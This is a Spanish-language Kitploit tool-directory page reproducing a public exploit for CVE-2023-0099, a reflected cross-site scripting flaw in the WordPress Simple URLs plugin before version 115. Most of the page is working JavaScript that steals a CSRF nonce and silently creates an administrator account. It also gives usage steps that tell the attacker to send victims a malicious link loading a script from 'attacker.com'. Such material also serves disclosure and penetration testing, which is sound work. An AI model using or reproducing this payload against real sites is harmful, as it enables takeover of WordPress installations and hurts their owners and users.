Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-0099-exploit — urls simples < 115 - Reflected XSS | Kitploit
Herramientas/GitHubGitHub/amirzargham/cve-2023-0099-exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubamirzargham/cve-2023-0099-exploit

CVE-2023-0099-exploit

urls simples < 115 - Reflected XSS

Ver Repositorio
61hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-0099-exploit

Título del Exploit: simple urls < 115 - Reflected XSS

Google Dork:

Autor del Exploit: AmirZargham

Página del Proveedor: https://getlasso.co/

Enlace del Software: https://wordpress.org/plugins/simple-urls/

Versión: < 115

Probado en: firefox, chrome

CVE: CVE-2023-0099

CWE: CWE-79

Plataforma: MÚLTIPLE

Tipo: WebApps

Descripción El plugin Simple URLs de WordPress anterior a la versión 115 no sanitiza ni escapa algunos parámetros antes de mostrarlos de vuelta en algunas páginas, lo que provoca un Cross-Site Scripting Reflejado que podría utilizarse contra usuarios con altos privilegios, como administradores.

Exploit:

root@kitploit:~
function getCSRFToken(url, csrf_token_id, func){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
var parser = new DOMParser();
var htmlDocument = parser.parseFromString(this.responseText, "text/html");
var token = htmlDocument.getElementById(csrf_token_id).value;
func(token);
}

};
xhr.open("GET", url, true);
xhr.withCredentials = true;
xhr.send();

}

function addAdmin(token){
var xhr = new XMLHttpRequest();
xhr.open("POST","http://vulnerable.site/wp-admin/user-new.php", true);
xhr.withCredentials = true;
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("action=createuser&_wpnonce_create-user=" + token + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=hack-admin&[email protected]&first_name=&last_name=&url=&pass1=1234&pass2=1234&pw_weak=on&send_user_notification=1&role=administrator&createuser=Add+New+User");
}

getCSRFToken("http://vulnerable.site/wp-admin/user-new.php", "_wpnonce_create-user", addAdmin);

Información de Uso:

  1. Guarda el código del exploit en el servidor como archivo JavaScript.
  2. En el archivo del exploit, cambia los valores:
    • user_login: Nombre de usuario arbitrario
    • pass1: Contraseña arbitraria
    • pass2: Contraseña arbitraria
    • email: Correo electrónico arbitrario
  3. Ahora envía el enlace malicioso a la víctima: https://vulnerable.com/wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=</script><script src="https://attacker.com/exploit.js"></script>
  4. Sabiendo que se creó un usuario administrador, ve a /wp-admin o similar, e inicia sesión en el panel de WordPress.

Publicado en: exploit-db.

Publicado en: 0day.today.

Publicado en: packet storm.

Descargar herramienta